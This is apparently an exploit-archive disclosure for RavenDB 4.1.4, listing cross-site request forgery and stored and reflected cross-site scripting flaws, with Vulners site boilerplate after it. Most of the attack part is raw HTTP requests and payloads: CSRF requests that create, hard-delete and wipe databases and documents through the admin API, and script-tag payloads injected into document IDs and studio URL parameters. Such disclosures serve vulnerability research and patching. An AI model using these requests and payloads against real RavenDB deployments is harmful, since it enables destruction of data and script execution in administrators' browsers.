##################################################################################################################################
# Exploit Title: RavenDB 4.1.4 | Multiple Vulnerabilities
# Exploit Author: Ozer Goker
# Vendor Homepage: https://ravendb.net
# Software Link: https://ravendb.net/download
# Version: 4.1.4
##################################################################################################################################
Introduction
Hibernating Rhinos, a global provider of database infrastructure solutions,
empowers Fortune 500 companies and enterprises across the globe to process
online transactions through an open source platform. RavenDB is the
industryas first fully-transactional, NoSQL ACID database that combines
scalability, high-availability, speed and performance. The company produces
two ORM tools, NHibernate and Entity Framework Profilers, that inspect,
analyze and suggest improvements to database access patterns in
applications. Hibernating Rhinos is headquartered in Hadera, Israel with
offices in the U.S. and Poland and extends its reach through over 1500+
customers worldwide.
#################################################################################
Vulnerabilities: CSRF | XSS Reflected & Stored
#################################################################################
CSRF details:
#################################################################################
CSRF1
Create Database
PUT /admin/databases?name=testdb&replicationFactor=1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 120
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"DatabaseName":"testdb","Settings":{},"Disabled":false,"Encrypted":false,"Topology":{"DynamicNodesDistribution":false}}
#################################################################################
CSRF2
Delete Database
DELETE /admin/databases HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"HardDelete":true,"DatabaseNames":["testdb"]}
#################################################################################
CSRF3
Create Document
POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":null,"@id":"testdoc"}},"Id":"testdoc","Type":"PUT"}]}
#################################################################################
CSRF4
Delete Document
DELETE /databases/testdb/studio/collections/docs?name=%40all_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"ExcludeIds":[]}
#################################################################################
XSS details:
#################################################################################
XSS1
Create Document
POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 170
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":"<script>alert(1)<","@id":"<script>alert(1)</script>"}},"Id":"<script>alert(1)</script>","Type":"PUT"}]}
#################################################################################
XSS2
Delete Document
POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 85
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"Commands":[{"Id":"<script>alert(1)</script>","Type":"DELETE","ChangeVector":null}]}
#################################################################################
XSS3
URL
http://127.0.0.1:8080/studio/index.html#databases/documents?&database=testdb%3Cscript%3Ealert(2)%3C/script%3E
METHOD
Get
PARAMETER
database
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS4
URL
http://127.0.0.1:8080/studio/index.html#databases/edit?&database=testdb&id=testdoc%3Cscript%3Ealert(3)%3C/script%3E
METHOD
Get
PARAMETER
id
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS5
URL
http://127.0.0.1:8080/studio/index.html#databases/status/storage/report?&database=testdb%3Cscript%3Ealert(4)%3C/script%3E
METHOD
Get
PARAMETER
database
PAYLOAD
<script>alert(4)</script>
#################################################################################
# 0day.today [2019-03-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation